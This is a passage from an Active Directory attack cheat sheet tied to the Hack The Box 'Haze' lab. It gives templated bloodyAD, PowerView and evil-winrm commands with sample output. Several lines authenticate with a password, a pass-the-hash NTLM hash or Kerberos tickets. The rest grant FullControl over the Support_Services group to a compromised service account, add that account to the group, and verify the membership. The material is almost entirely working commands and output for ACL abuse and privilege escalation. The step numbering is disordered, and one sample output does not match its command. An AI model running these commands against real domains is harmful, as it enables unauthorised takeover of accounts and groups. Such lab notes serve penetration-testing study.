Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb get object 'SUPPORT_SERVICES' distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb cn: Support_Services dSCorePropagationData: 2025-10-31 22:42:14+00:00 groupType: -2147483646 instanceType: 4 member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb ---[SNIP]---
# NTLM bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get object '<GROUP>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb get object 'SUPPORT_SERVICES' distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb cn: Support_Services dSCorePropagationData: 2025-10-31 22:42:14+00:00 groupType: -2147483646 instanceType: 4 member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb ---[SNIP]---
# Password-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> get object '<GROUP>'
Sample Output: $ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES' distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb cn: Support_Services dSCorePropagationData: 2025-10-31 22:46:22+00:00 groupType: -2147483646 instanceType: 4 member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb ---[SNIP]---
# NTLM-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> get object '<GROUP>'
Sample Output: $ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb get object 'SUPPORT_SERVICES' distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb cn: Support_Services dSCorePropagationData: 2025-10-31 22:46:22+00:00 groupType: -2147483646 instanceType: 4 member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb ---[SNIP]---
# Ticket-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> get object '<GROUP>'
Sample Output: $ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES' distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb cn: Support_Services dSCorePropagationData: 2025-10-31 22:46:22+00:00 groupType: -2147483646 instanceType: 4 member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb ---[SNIP]---

1. Add User to Group

Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
Sample Output: ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯ Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights fullcontrol [2025-10-31 22:23:23] [Add-DomainObjectACL] Found target identity: CN=Support_Services,CN=Users,DC=haze,DC=htb [2025-10-31 22:23:23] [Add-DomainObjectACL] Found principal identity: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb [2025-10-31 22:23:23] Adding FullControl to S-1-5-21-323145914-28650650-2368316563-1112 [2025-10-31 22:23:23] [Add-DomainObjectACL] Success! Added ACL to CN=Support_Services,CN=Users,DC=haze,DC=htb

2. Check

Get-DomainGroupMember -Identity '<GROUP>'
Sample Output: ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯ Get-DomainGroupMember -Identity 'Support_Services' GroupDomainName : Support_Services GroupDistinguishedName : CN=Support_Services,CN=Users,DC=haze,DC=htb MemberDomain : haze.htb MemberName : Haze-IT-Backup$ MemberDistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb MemberSID : S-1-5-21-323145914-28650650-2368316563-1111

1. Import PowerView.ps1

. .\PowerView.ps1
Sample Output: evil-winrm-py PS C:\programdata> . .\PowerView.ps1

2. Add Full Control to the User Over the Group

Add-DomainObjectAcl -TargetIdentity '<GROUP>' -PrincipalIdentity '<USER>' -Rights All -DomainController <DC>
Sample Output: evil-winrm-py PS C:\programdata> Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights All -DomainController dc01.haze.htb

4. Add User to the Group

Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>' -Credential $cred
Sample Output: evil-winrm-py PS C:\programdata> Add-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'

5. Check

Get-DomainGroupMember -Identity '<GROUP>' -Domain <DOMAIN> -DomainController <DC> -Credential $cred | fl MemberName
Sample Output: evil-winrm-py PS C:\programdata> Get-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Domain haze.htb -DomainController dc01.haze.htb | fl MemberName MemberName : Haze-IT-Backup$